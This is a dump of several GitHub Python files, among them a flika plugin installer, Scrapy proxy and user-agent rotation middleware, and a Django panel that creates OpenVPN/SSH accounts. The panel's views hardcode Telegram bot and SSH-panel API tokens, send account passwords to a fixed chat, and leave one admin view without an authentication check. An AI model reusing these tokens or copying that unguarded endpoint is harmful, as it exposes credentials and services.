plugin\")\n if isinstance(plugin, str):\n if plugin in PluginManager.plugins:\n plugin = PluginManager.plugins[plugin]\n else:\n return\n if plugin.url is None:\n return\n failed = []\n dists = [a.project_name for a in pkg_resources.working_set]\n PluginManager.gui.statusBar.showMessage(\"Installing dependencies for %s\" % plugin.name)\n for pl in plugin.dependencies:\n try:\n if pl in dists:\n continue\n a = __import__(pl)\n except ImportError:\n res = subprocess.call([sys.executable, '-m', 'pip', 'install', '{}'.format(pl), '--no-cache-dir'])\n if res != 0:\n failed.append(pl)\n if failed:\n if platform.system() == 'Windows':\n QtGui.QDesktopServices.openUrl(QtCore.QUrl(\"http://www.lfd.uci.edu/~gohlke/pythonlibs/#\"+pl))\n v = str(sys.version_info.major) + str(sys.version_info.minor)\n if platform.architecture()[0]=='64bit':\n arch = '_amd64'\n else:\n arch = '32'\n g.alert(\"\"\"Failed to install the dependency '{0}'. You must install {0} manually.\nDownload {0}-x-cp{1}-cp{1}m-win{2}.whl.\n\nOnce the wheel is downloaded, drag it into flika to install.\n\nThen try installing the plugin again.\"\"\".format(pl, v, arch))\n else:\n g.alert(\"Failed to install dependencies for {}:\\n{}\\nYou must install them on your own before installing this plugin.\".format(plugin.name, ', '.join(failed)))\n\n return\n\n if os.path.exists(os.path.join(plugin_dir, plugin.directory)):\n g.alert(\"A folder with name {} already exists in the plugins directory. Please remove it to install this plugin!\".format(plugin.directory))\n return\n\n PluginManager.gui.statusBar.showMessage('Opening %s' % plugin.url)\n try:\n data = urlopen(plugin.url).read()\n except:\n g.alert(title=\"Download Error\", msg=\"Failed to connect to %s to install the %s flika Plugin. Check your internet connection and try again, or download the plugin manually.\" % (PluginManager.gui.link, plugin.name), icon=QtWidgets.QMessageBox.Warning)\n return\n\n try:\n\n with tempfile.TemporaryFile() as tf:\n tf.write(data)\n tf.seek(0)\n with zipfile.ZipFile(tf) as z:\n folder_name = os.path.dirname(z.namelist()[0])\n z.extractall(plugin_dir)\n\n plugin = PluginManager.plugins[plugin.name]\n directory = os.path.join(plugin_dir, plugin.directory)\n os.rename(os.path.join(plugin_dir, folder_name), directory)\n except (PermissionError, Exception) as e:\n if os.path.exists(folder_name):\n shutil.rmtree(folder_name)\n if isinstance(e, PermissionError):\n g.alert(\"Unable to download plugin to {}. Rerun flika as administrator and download the plugin again.\".format(plugin.name), title='Permission Denied')\n else:\n g.alert(\"Error occurred while installing {}.\\n\\t{}\".format(plugin.name, e), title='Plugin Install Failed') \n \n return\n \n PluginManager.gui.statusBar.showMessage('Extracting %s' % plugin.name)\n plugin.version = plugin.latest_version\n plugin.listWidget.setIcon(QtGui.QIcon(image_path(\"check.png\")))\n #plugin.menu = make_plugin_menu(plugin)\n plugin.menu = QtWidgets.QMenu(plugin.name)\n build_submenu(plugin.directory, plugin.menu, plugin.menu_layout)\n \n PluginManager.gui.statusBar.showMessage('Successfully installed {} and it\\'s dependencies'.format(plugin.name))\n PluginManager.gui.pluginSelected(plugin.listWidget)\n plugin.installed = True\n\n\nclass Load_Local_Plugins_Thread(QtCore.QThread):\n plugins_done_sig = QtCore.Signal(dict)\n error_loading = QtCore.Signal(str)\n def __init__(self):\n QtCore.QThread.__init__(self)\n\n def run(self):\n #logger.debug(\"Started 'app.plugin_manager.load_local_plugins'\")\n plugins = {n: Plugin(n) for n in plugin_list}\n installed_plugins = {}\n for pluginPath in PluginManager.local_plugin_paths():\n p = Plugin()\n p.fromLocal(pluginPath)\n try:\n p.bind_menu_and_methods()\n if p.name not in plugins.keys() or p.name not in installed_plugins.keys():\n p.installed = True\n plugins[p.name] = p\n installed_plugins[p.name] = p\n else:\n g.alert('Could not load the plugin {}. There is already a plugin with this same name. Change the plugin name in the info.xml file'.format(p.name))\n except Exception as e:\n msg = \"Could not load plugin {}\".format(pluginPath)\n self.error_loading.emit(msg)\n #g.alert(msg)\n logger.error(msg)\n ex_type, ex, tb = sys.exc_info()\n sys.excepthook(ex_type, ex, tb)\n self.plugins_done_sig.emit(plugins)\n #logger.debug(\"Completed 'app.plugin_manager.load_local_plugins'\")\n\n# from flika.app.plugin_manager import *\n\n\nlogger.debug(\"Completed 'reading app/plugin_manager.py'\")","repo_name":"flika-org/flika","sub_path":"flika/app/plugin_manager.py","file_name":"plugin_manager.py","file_ext":"py","file_size_in_byte":23503,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"37"} +{"seq_id":"1823350072","text":"# Create a program where the user can enter five numerical values and add them to a list, already in the correct insertion position (without using sort()). Finally, display the sorted list on the screen.\nlist = []\nfor c in range(0, 5):\n n = int(input('Value: '))\n if c == 0 or n > list[-1]:\n list.append(n)\n else: \n i = 0\n while i < len(list):\n if n <= list[i]:\n list.insert(i, n)\n break\n i += 1\nprint(list)\n","repo_name":"patriciagivort/pythonchalleg","sub_path":"ex80.py","file_name":"ex80.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4490132683","text":"'''\r\nCreated on 18.06.2019\r\n\r\n@author: fseemab\r\n'''\r\nimport time\r\n\r\nfrom ibvpy.fets import FETS2D4Q\r\nfrom simulator.xdomain.xdomain_fe_grid import XDomainFEGrid\r\nfrom view.window.bmcs_window import BMCSWindow\r\n\r\nfrom apps.verify.bond_cum_damage.pullout_2d_model.pullout2d_model import PullOut2D\r\nfrom apps.verify.bond_cum_damage.pullout_2d_model.verify02_quasi_pullout import verify02_quasi_pullout\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pylab as p\r\nimport traits.api as tr\r\n\r\n\r\ndef verify_normalized_pullout_force():\r\n\r\n ds = 16\r\n r_steel = ds / 2\r\n L_x = ds * 5\r\n r_concrete = 75\r\n n_x = 2\r\n n_y = 2\r\n ax = p.subplot(111)\r\n\r\n f_list = [0] # [0, -5, -10, -15, -20]\r\n for f_lateral in f_list: # [0, -100]\r\n\r\n print('lateral confining pressure', f_lateral)\r\n\r\n s = verify02_quasi_pullout(f_lateral=f_lateral)\r\n s.xd_steel.trait_set(coord_min=(0, 0),\r\n coord_max=(L_x, r_steel),\r\n shape=(n_x, 1)\r\n )\r\n s.xd_concrete.trait_set(coord_min=(0, r_steel),\r\n coord_max=(L_x, r_concrete),\r\n shape=(n_x, n_y)\r\n )\r\n s.u_max = 0.2\r\n s.tline.step = 0.01\r\n s.run()\r\n print('F', np.sum(s.hist.F_t[-1, s.right_x_s.dofs]))\r\n w = s.get_window()\r\n w.viz_sheet.viz2d_dict['Pw'].plot(ax, 1)\r\n\r\n print('P_max', np.max(s.record['Pw'].sim.hist.F_t))\r\n print('P_end', np.sum(s.hist.F_t[-1, s.right_x_s.dofs]))\r\n\r\n# if False:\r\n# s = verify02_quasi_pullout(f_lateral=f_lateral)\r\n# s.xd_steel.trait_set(coord_min=(0, 0),\r\n# coord_max=(L_x, r_steel),\r\n# shape=(n_x, 1)\r\n# )\r\n# s.xd_concrete.trait_set(coord_min=(0, r_steel),\r\n# coord_max=(r_steel, r_concrete),\r\n# shape=(n_x, n_y)\r\n# )\r\n# s.u_max = 0.5\r\n# s.tline.step = 0.05\r\n s.m_steel.trait_set(E=200000, nu=0.3)\r\n s.m_concrete.trait_set(E=29800, nu=0.3)\r\n s.m_ifc.trait_set(E_T=12900,\r\n E_N=1e9,\r\n tau_bar=4.2, # 4.0,\r\n K=0, gamma=10, # 10,\r\n c=1, S=0.0025, r=1,\r\n m=0,\r\n algorithmic=False)\r\n s.f_lateral = f_lateral\r\n\r\n w = s.get_window()\r\n w.viz_sheet.viz2d_dict['Pw'].plot(ax, 1)\r\n\r\n s.run()\r\n p.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n verify_normalized_pullout_force()\r\n","repo_name":"simvisage/bmcs","sub_path":"apps/verify/bond_cum_damage/pullout_2d_model/verify03_pullout2d_normalized_max_pullout.py","file_name":"verify03_pullout2d_normalized_max_pullout.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"32691896379","text":"# -*- coding: utf-8 -*-\n# vStream https://github.com/Kodi-vStream/venom-xbmc-addons\n# https://letsupload.co/plugins/mediaplayer/site/_embed.php?u=1r0c1&w=770&h=320\nfrom resources.lib.handler.requestHandler import cRequestHandler\nfrom resources.hosters.hoster import iHoster\nfrom resources.lib.parser import cParser\n\n\nclass cHoster(iHoster):\n\n def __init__(self):\n iHoster.__init__(self, 'letsupload', 'Letsupload')\n\n def isDownloadable(self):\n return False\n\n def _getMediaLinkForGuest(self):\n api_call = ''\n oRequest = cRequestHandler(self._url)\n sHtmlContent = oRequest.request()\n\n oParser = cParser()\n sPattern = 'file: *\"([^\"]+)\",*'\n\n aResult = oParser.parse(sHtmlContent, sPattern)\n if aResult[0] is True:\n api_call = aResult[1][0]\n\n if api_call:\n return True, api_call\n\n return False, False\n","repo_name":"Kodi-vStream/venom-xbmc-addons","sub_path":"plugin.video.vstream/resources/hosters/letsupload.py","file_name":"letsupload.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":456,"dataset":"github-code","pt":"37"} +{"seq_id":"73330711146","text":"\"\"\"\n# GitHub examples repository path: Powersensors/Python/RsInstrument\n\nCreated on 2022/02\n\nAuthor: Jahns_P\nVersion Number: 1\nDate of last change: 2022/02/03\nRequires: NRX, FW 02.50.21112602 or newer , adequate sensor and signal source\n- Installed RsInstrument Python module (see the attached RsInstrument_PythonModule folder Readme.txt)\n- Installed VISA e.g. R&S Visa 5.12.x or newer\n\nDescription: Example for single triggered measurement with marker support\n\nGeneral Information:\n\nPlease always check this example script for unsuitable setting that may\ndestroy your DUT or instrument before connecting!\nThis example does not claim to be complete. All information has been\ncompiled with care. However, errors can not be ruled out.\n\"\"\"\n\nfrom RsInstrument import *\nfrom time import sleep\n\nRsInstrument.assert_minimum_version('1.53.0')\n\n#\n# Signal for the following settings is pulse modulated, 1m s PRI, 10 µs duty\n#\n\nnrp = RsInstrument('TCPIP::10.205.0.82::hislip0', True, True, \"SelectVisa='rs'\")\n'''\n(resource, True, True, \"SelectVisa='rs'\") has the following meaning:\n(VISA-resource, id_query, reset, options)\n- id_query: if True: the instrument's model name is verified against the models \nsupported by the driver and eventually throws an exception. \n- reset: Resets the instrument (sends *RST) command and clears its status syb-system\n- option SelectVisa:\n - 'SelectVisa = 'socket' - uses no VISA implementation for socket connections - you do not need any VISA-C installation\n - 'SelectVisa = 'rs' - forces usage of Rohde&Schwarz Visa\n - 'SelectVisa = 'ni' - forces usage of National Instruments Visa \n'''\n\nsensor = nrp.query_str('SENS:CAT?') # Request for connected sensor(s)\nprint('The following sensor is connected:', sensor)\nprint('Now performing Zeroing - please remove signal source from the sensor and confirm')\n_ = input()\nprint('...Please wait until zeroing is done...')\nnrp.write_str_with_opc('CAL1:ZERO ONCE') # Perform Zeroing for all connected sensors\nprint('\\nZeroing completed - please connect signal source to the sensor')\n_ = input()\nnrp.write_str_with_opc('DISPlay:LAYout L1') # Display contains just one window\nnrp.write_str_with_opc('CALCulate1:TYPE TRACe') # Switch to Trace Mode\nnrp.write_str('Sense1:TRACe:TIME .0002') # Set displayed time range (10 times of time/div)\nnrp.write_str_with_opc('FREQ 1GHz') # Set working frequency (important for internal correction)\nnrp.write_str_with_opc('TRIGger1:MODE SINGle') # Single trigger mode\nnrp.write_str('TRIGger1:CHAN1:LEV -21') # Trigger level\nnrp.write_str_with_opc('DISPlay1:TRACe:MARKer1:MODE MEASure') # Show triangle on marker position\nnrp.write_str_with_opc('DISPlay1:TRACe:MARKer1:POSition:MODE PSE') # Peak search on for marker measurement\nnrp.write_str_with_opc('DISPlay:WINDow1:Trace:MARKer:SELection M1') # Shows the marker in the trace\nnrp.write_str_with_opc('CALCulate1:DMODe MARKer') # Switch display mode to marker display (from info mode)\n\nsleep(.01)\nx = 0\nwhile x < 1000:\n level = nrp.query_str('CALCulate1:TRACe:MARKer1:YPOSition?') # Request marker amount in dBm\n print('current measured level is ', level, ' dBm')\n x += 1\n if x == 5:\n break\n nrp.write_str_with_opc('INITiate1:IMMediate') # Reset trigger state (wait for new event when in single trigger mode)\n sleep(1)\n","repo_name":"Rohde-Schwarz/Examples","sub_path":"Powersensors/Python/RsInstrument/RsInstrument_NRX_Trace_Trigger_Marker_Readout.py","file_name":"RsInstrument_NRX_Trace_Trigger_Marker_Readout.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"37"} +{"seq_id":"35020303883","text":"from django.contrib import admin\r\nfrom django.urls import path , include\r\nfrom . import views\r\napp_name = 'my_project'\r\nurlpatterns = [\r\n \r\n path('' ,views.home),\r\n path('download' ,views.download),\r\n \r\n path('download/' ,views.downloaded, name=\"downloaded\"),\r\n path('download/' ,views.downloaded_audio, name=\"downloaded_audio\"),\r\n path('download/done' ,views.done),\r\n \r\n]\r\n","repo_name":"rajPawarRmp/youdown","sub_path":"myapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"25559929056","text":"import math\n\ndef check(n):\n k = math.sqrt(n)\n if n < 2:\n return False\n\n for i in range(2, int(k)+1):\n if n % i == 0:\n return False\n return True\n\ndef solution(numbers):\n answer = 0\n for i in range(1,numbers+1):\n if check(i):\n answer+=1\n return answer\n\nprint(solution(10))\n","repo_name":"vvspearlvvs/CodingTest","sub_path":"2.프로그래머스lv1/숫자_소수찾기/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28117042900","text":"# -*- coding: utf-8 -*-\n\n# Define here the models for your spider middleware\n#\n# See documentation in:\n# https://docs.scrapy.org/en/latest/topics/spider-middleware.html\n\nimport logging\nimport random\nfrom logging import getLogger\n\nfrom scrapy.http import HtmlResponse\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\n\nfrom googlegroup.user_agent import agents\n\n\nclass ProxyMiddleware(object):\n \"\"\"\n A class to communicate with proxy server. When a request fail several times,\n this class grabs a random proxy server and configure it as a downloader middleware\n to use for crawling.\n\n Methods\n -------\n get_random_proxy(self):\n Grabs a random proxy server.\n\n process_request(self, response, spider):\n Grabs a random proxy server and configure it as a downloader middleware to use for crawling.\n \"\"\"\n\n def __init__(self, proxy_url):\n self.logger = logging.getLogger(__name__)\n self.proxy_url = proxy_url\n\n def process_request(self, request, spider):\n request.meta['proxy'] = self.proxy_url\n self.logger.info(\"request.meta: {}\".format(request.meta))\n\n @classmethod\n def from_crawler(cls, crawler):\n settings = crawler.settings\n return cls(\n proxy_url=settings.get('PROXY_URL')\n )\n\n\nclass RandomUserAgentMiddleware(object):\n \"\"\"\n A class to randomly change the user agent in HTTP requests. It randomly choose\n a user agent from a given list and configure it as a downloader middleware.\n\n Methods\n -------\n process_request(self, request, spider):\n Randomly choose an user agent from `user_agent` in user_agent.py,\n and then use it to change the user agent in HTTP requests.\n \"\"\"\n\n def __init__(self):\n self.logger = logging.getLogger(__name__)\n\n def process_request(self, request, spider):\n agent = random.choice(agents)\n request.headers[\"User-Agent\"] = agent\n self.logger.debug('Change UserAgent to ' + agent)\n\n\nclass SeleniumMiddleware:\n \"\"\"A class to use the python package `Selenium` to mock a browser and crawl pages by controlling the browser. This download middleware is only enabled when `is_start` is set on Scrapy request's metadata.\n\n Methods\n -------\n process_request(self, request, spider):\n This function mock a browser and crawl pages by controlling the browser. First it wait for the page to crawl until fully loaded. Second it scroll down the page to load AJAX data by executing some Javascript codes. At last it return the loaded page source as Scrapy's Response for further processes.\n\n \"\"\"\n def __init__(self, timeout=None):\n self.logger = getLogger(__name__)\n self.timeout = timeout\n\n chrome_options = Options()\n chrome_options.add_argument(\"--headless\")\n\n self.browser = webdriver.Chrome(options=chrome_options)\n self.browser.set_window_size(1400, 700)\n self.browser.set_page_load_timeout(self.timeout)\n self.wait = WebDriverWait(self.browser, self.timeout)\n\n def __del__(self):\n self.browser.close()\n\n def process_request(self, request, spider):\n if request.meta.get('is_start') is True:\n\n self.logger.info(\"Headless Chrome is Starting\")\n try:\n self.browser.get(\"https://groups.google.com/forum/#!forum/alluxio-users\")\n wait = WebDriverWait(self.browser, 1000)\n wait.until(EC.presence_of_element_located((By.CLASS_NAME, 'F0XO1GC-b-F')))\n\n elem = self.browser.find_element(By.XPATH, '//*[@class=\"F0XO1GC-b-F\"]')\n\n last_height = elem.get_attribute('scrollHeight')\n\n for i in range(30):\n self.browser.execute_script(\n \"document.getElementsByClassName('F0XO1GC-b-F')[0].scrollTo(0, document.getElementsByClassName('F0XO1GC-b-F')[0].scrollHeight)\")\n\n while elem.get_attribute('scrollHeight') == last_height:\n continue\n\n last_height = elem.get_attribute('scrollHeight')\n\n self.logger.info(\"Scrolling Executed\")\n\n return HtmlResponse(url=request.url, body=self.browser.page_source, request=request, encoding='utf-8',\n status=200)\n\n except TimeoutException:\n return HtmlResponse(url=request.url, status=500, request=request)\n\n @classmethod\n def from_crawler(cls, crawler):\n return cls(timeout=crawler.settings.get('SELENIUM_TIMEOUT'))\n","repo_name":"SKYSCRAPERS1999/MyCrawlings","sub_path":"googlegroup/googlegroup/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":4807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42701014666","text":"import os\n\n# Import our global defaults.\nfrom tally.conf.settings.default import *\n\n\n# Inherit from environment specific config.\nDJANGO_CONF = os.environ.get('DJANGO_CONF', 'default')\nif DJANGO_CONF != 'default':\n module = __import__(DJANGO_CONF, globals(), locals(), ['*'])\n for k in dir(module):\n locals()[k] = getattr(module, k)\n\n# Import local settings\ntry:\n from local_settings import *\nexcept ImportError:\n import sys, traceback\n sys.stderr.write(\"Warning: Can't find the file 'local_settings.py' \"\n \"in the directory containing %r.\" % __file__)\n sys.stderr.write(\"\\nFor debugging purposes, the exception was:\\n\\n\")\n traceback.print_exc()\n\n# Remove disabled apps.\nif 'DISABLED_APPS' in locals():\n INSTALLED_APPS = [k for k in INSTALLED_APPS if k not in DISABLED_APPS]\n\n MIDDLEWARE_CLASSES = list(MIDDLEWARE_CLASSES)\n\n for a in DISABLED_APPS:\n for x, m in enumerate(MIDDLEWARE_CLASSES):\n if m.startswith(a):\n MIDDLEWARE_CLASSES.pop(x)\n","repo_name":"Mapkin/tally","sub_path":"tally/conf/settings/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2284364451","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.http import HttpResponse, HttpResponseRedirect, FileResponse\nfrom django.urls import reverse\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.core.files.storage import FileSystemStorage\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate, login\nfrom account.models import Profile, Account, Action, Server\nfrom django.core.files import File\nfrom django.utils import timezone\nimport datetime\nimport requests\nimport os\n\ncurrent_dir = os.getcwd()\n\ndef document_sender(chat_id, file, caption):\n\tapiToken = '6292864503:AAHSpBSym2NVJuubNdfmuUFCxf5z-i8Gpnc'\n\tapiURL = f'https://api.telegram.org/bot{apiToken}/sendDocument'\n\tfiles = {'document': open(file,'rb')}\n\tdata = {'chat_id': chat_id, 'parse_mode':'HTML', 'caption':caption}\n\tr = requests.post(apiURL, data=data, files=files, stream=True)\n\treturn r.json()\n\ndef create_ssh_config(username, password, expdate):\n\ttoken = '1693053954X7H0C3M46ETKGSY'\n\turl = \"https://cofee.fdlock.xyz:1978/api/adduser\"\n\n\tj = {'token': token, 'username': username, 'password': password, 'multiuser': '1', 'traffic': '50', 'type_traffic': 'gb', 'expdate': expdate}\n\tx = requests.post(url, json=j)\n\treturn x\n\ndef account_generator(profile, server, account_name):\n\tserver_ip = server.ir_ip\n\tfor i in os.listdir('{}/cli/{}'.format(current_dir, server_ip)):\n\t\tif i.startswith('cli_'):\n\t\t\tnone_name = i\n\t\t\tbreak\n\n\tglobal pas\n\tpas = ''\n\twith open('{}/cli/{}/pass.txt'.format(current_dir, server_ip), 'r') as f:\n\t\tlines = f.readlines()\n\t\tfor line in lines:\n\t\t\tprint(line)\n\t\t\tif line.startswith(none_name):\n\t\t\t\tpas = line.split(' : ')[1]\n\n\tos.rename('{}/cli/{}/{}'.format(current_dir, server_ip, none_name), '{}/cli/{}/{}.ovpn'.format(current_dir, server_ip, account_name))\n\twith open('{}/cli/{}/{}.ovpn'.format(current_dir,server_ip, account_name), 'rb') as f:\n\t\tovpn_file = File(f)\n\t\tovpn_file = File(f, name=os.path.basename('{}/cli/{}/{}.ovpn'.format(current_dir, server_ip, account_name)))\n\t\taccount = Account(name=account_name, password = pas, file = ovpn_file, server = server, cli_name = none_name.split('.')[0], leader = profile)\n\t\taccount.save()\n\n\tcreate_ssh_config(account.name, account.password, account.date_end.strftime(\"%Y-%m-%d\"))\n\tdocument_sender('515098162', '{}/cli/{}/{}.ovpn'.format(current_dir, server_ip, account_name), pas)\n\n\taction = Action(leader = profile, action = 0, account = account)\n\taction.save()\n\ndef home(request):\n\tif request.user.is_authenticated:\n\t\tif request.user.is_superuser:\n\t\t\tprofiles = Profile.objects.all()\n\t\t\tservers = Server.objects.all()\n\t\t\taccounts = Account.objects.all()\n\n\n\t\t\tadmin_accounts = Account.objects.filter(leader=get_object_or_404(Profile, user=request.user)).order_by('-date_end')\n\n\t\t\tcontext = { 'profiles': profiles,\n\t\t\t\t'servers': servers,\n\t\t\t\t'accounts': accounts,\n\t\t\t\t'admin_accounts': admin_accounts,\n\t\t\t}\n\n\n\t\t\treturn render(request, 'superadmin/home.html', context=context)\n\t\telse:\n\t\t\treturn redirect('account:profile')\n\telse:\n\t\treturn redirect('account:login_view')\n\ndef admin_profile(request):\n\tif request.user.is_authenticated:\n\t\tif request.user.is_superuser:\n\t\t\tprofiles = Profile.objects.all()\n\t\t\tservers = Server.objects.all()\n\t\t\taccounts = Account.objects.all()\n\n\t\t\tadmin_accounts = Account.objects.filter(leader=get_object_or_404(Profile, user=request.user)).order_by('-date_end')\n\n\t\t\tcontext = {'profiles': profiles,\n\t\t\t\t'servers': servers,\n\t\t\t\t'accounts': accounts,\n\t\t\t\t'admin_accounts': admin_accounts,\n\t\t\t}\n\t\t\treturn render(request, 'superadmin/manage.html', context = context)\n\telse:\n\t\treturn redirect('account:login_view')\n\ndef profile(request, profile_id):\n\tif request.user.is_authenticated:\n\t\tif request.user.is_superuser:\n\t\t\tprofile = get_object_or_404(Profile, id=profile_id)\n\t\t\taccounts = Account.objects.filter(leader=profile).order_by('-date_end')\n\t\t\taccounts_count = accounts.count()\n\t\t\tall_account = profile.count\n\t\t\taccounts_left = all_account - accounts_count\n\n\t\t\tservers = Server.objects.all()\n\n\t\t\ttoday = timezone.datetime.today().day\n\n\t\t\tcontext = {'profile': profile,\n\t\t\t\t'accounts': accounts,\n\t\t\t\t'accounts_count': accounts_count,\n\t\t\t\t'accounts_left': accounts_left,\n\t\t\t\t'today': today,\n\t\t\t\t'servers': servers,\n\t\t\t}\n\n\t\t\treturn render(request, 'superadmin/profile.html', context)\n\telse:\n\t\treturn redirect('account:login_view')\n\ndef change_server(request, profile_id):\n\tif request.user.is_authenticated:\n\t\tif request.user.is_superuser:\n\t\t\tprofile = get_object_or_404(Profile, id=profile_id)\n\t\t\tserver = get_object_or_404(Server, ir_ip=request.POST['server_shift'])\n\t\t\tprofile.server = server\n\t\t\tprofile.save()\n\t\t\treturn redirect('superadmin:profile', profile_id)\n\telse:\n\t\treturn redirect('account:login_view')\n\ndef charge_coin(request, profile_id):\n\tif request.user.is_authenticated:\n\t\tif request.user.is_superuser:\n\t\t\tprofile = get_object_or_404(Profile, id=profile_id)\n\t\t\tcoin_value = request.POST['charge_coin']\n\t\t\tprofile.count = int(coin_value)\n\t\t\tprofile.save()\n\t\t\treturn redirect('superadmin:profile', profile_id)\n\telse:\n\t\treturn redirect('account:login_view')\n\n\ndef server(request, server_id):\n\tif request.user.is_authenticated:\n\t\tif request.user.is_superuser:\n\t\t\tserver = get_object_or_404(Server, id=server_id)\n\t\t\tprofiles = Profile.objects.filter(server=server)\n\t\t\tcontext = {\n\t\t\t\t'server': server,\n\t\t\t\t'profiles': profiles,\n\t\t\t}\n\t\t\treturn render(request, 'superadmin/server.html', context)\n\telse:\n\t\treturn redirect('account:login_view')\n\n\ndef create_account(request):\n\tif request.user.is_authenticated:\n\t\tif request.user.is_superuser:\n\t\t\taccount_name = request.POST['account_name']\n\n\t\t\ttry:\n\t\t\t\tget_object_or_404(Account, name=account_name)\n\t\t\t\tmessages.add_message(request, messages.INFO, 'This name already taken')\n\t\t\texcept:\n\t\t\t\tif account_name != \"\":\n\t\t\t\t\tserver = get_object_or_404(Server, ir_ip=request.POST['server_shift'])\n\t\t\t\t\tprofile = get_object_or_404(Profile, user=request.user)\n\n\t\t\t\t\taccount_generator(profile, server, account_name)\n\t\t\t\telse:\n\t\t\t\t\tmessages.add_message(request, messages.INFO, 'Chose somename and donnot leave it blank !')\n\n\t\t\treturn redirect('superadmin:admin_profile')\n\t\telse:\n\t\t\treturn redirect('account:profile')\n\telse:\n\t\treturn redirect('account:login_view')\n\ndef test(request):\n\tif request.user.is_authenticated:\n\t\tif request.user.is_superuser:\n\t\t\tun = request.POST['username']\n\t\t\tpassword = request.POST['password']\n\n\t\t\tcn = request.POST['count']\n\t\t\tsi = request.POST['server_ip']\n\n\t\t\tprint(un, password, cn, si)\n\n\t\t\treturn redirect('superadmin:leader_creation')\n\t\telse:\n\t\t\treturn redirect('account:profile')\n\telse:\n\t\treturn redirect('account:login_view')\n\ndef send_profile(request, account_id):\n\tif request.user.is_authenticated:\n\t\taccount = get_object_or_404(Account, id=account_id)\n\t\tprofile = get_object_or_404(Profile, user=request.user)\n\n\t\tdocument_sender(profile.chat_id, '{}{}'.format(current_dir, account.file.url), account.password)\n\n\t\treturn redirect('account:profile')\n\telse:\n\t\treturn redirect('account:profile')\n\ndef leader_creation(request):\n\tif request.user.is_authenticated:\n\t\tif request.user.is_superuser:\n\t\t\tservers = Server.objects.all()\n\t\t\tcontext = {\n\t\t\t\t'servers': servers,\n\t\t\t}\n\n\t\t\treturn render(request, 'superadmin/leader_creation.html', context=context)\n\t\telse:\n\t\t\treturn redirect('account:profile')\n\telse:\n\t\treturn redirect('account:login_view')\n\ndef create_profile(request):\n\tif request.user.is_authenticated:\n\t\tif request.user.is_superuser:\n\t\t\tusername = request.POST['username']\n\t\t\tpassword = request.POST['password']\n\n\t\t\tcount = request.POST['count']\n\t\t\tserver_ip = request.POST['server_ip']\n\n\t\t\tuser = User.objects.create_user(username=username, password=password)\n\t\t\tuser.save()\n\n\t\t\tserver = get_object_or_404(Server, ir_ip=server_ip)\n\t\t\tprofile = Profile(user=user, count = int(count), server = server)\n\t\t\tprofile.save()\n\n\t\t\treturn redirect('superadmin:home')\n\t\telse:\n\t\t\treturn redirect('account:profile')\n\telse:\n\t\treturn redirect('account:login_view')\n\ndef server_creation(request):\n\tif request.user.is_authenticated:\n\t\tif request.user.is_superuser:\n\t\t\tservers = Server.objects.all()\n\t\t\tcontext = {\n\t\t\t\t'servers': servers,\n\t\t\t}\n\n\t\t\treturn render(request, 'superadmin/server_creation.html', context=context)\n\t\telse:\n\t\t\treturn redirect('account:profile')\n\telse:\n\t\treturn redirect('account:login_view')\n\ndef create_server(request):\n\tif request.user.is_authenticated:\n\t\tif request.user.is_superuser:\n\t\t\tserver_name = request.POST['server_name']\n\t\t\tir_ip = request.POST['ir_ip']\n\t\t\tfr_ip = request.POST['fr_ip']\n\n\t\t\tnext_server_ip = request.POST['next_server_ip']\n\t\t\tshift_server = get_object_or_404(Server, ir_ip=next_server_ip)\n\n\t\t\tserver = Server(name=server_name, ir_ip=ir_ip, fr_ip=fr_ip, next_server=shift_server)\n\t\t\tserver.save()\n\n\t\t\treturn redirect('superadmin:home')\n\t\telse:\n\t\t\treturn redirect('account:profile')\n\telse:\n\t\treturn redirect('account:login_view')\n\n\ndef activate_ssh_user(username):\n\ttoken = '1693053954X7H0C3M46ETKGSY'\n\turl = \"https://cofee.fdlock.xyz:1978/api/active\"\n\n\tj = {'token': token, 'username': username}\n\tx = requests.post(url, json=j)\n\treturn x\n\ndef deactivate_ssh_user(username):\n\ttoken = '1693053954X7H0C3M46ETKGSY'\n\turl = \"https://cofee.fdlock.xyz:1978/api/deactive\"\n\n\tj = {'token': token, 'username': username}\n\tx = requests.post(url, json=j)\n\treturn x\n\ndef reverse_ssh_status(request, server_id):\n\tserver = get_object_or_404(Server, id=server_id)\n\tnew_status = not server.ssh_status\n\n\tacc_list = Account.objects.filter(server=server)\n\tfor acc in acc_list:\n\t\tif new_status:\n\t\t\tactivate_ssh_user(acc.name)\n\t\telse:\n\t\t\tdeactivate_ssh_user(acc.name)\n\n\tserver.ssh_status = new_status\n\tserver.save()\n\n\treturn redirect('superadmin:server', server_id)\n","repo_name":"elephantishash/ovpn","sub_path":"superadmin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9720,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"275749693","text":"from django.contrib.humanize.templatetags.humanize import naturaltime\nfrom django.db.models import (\n 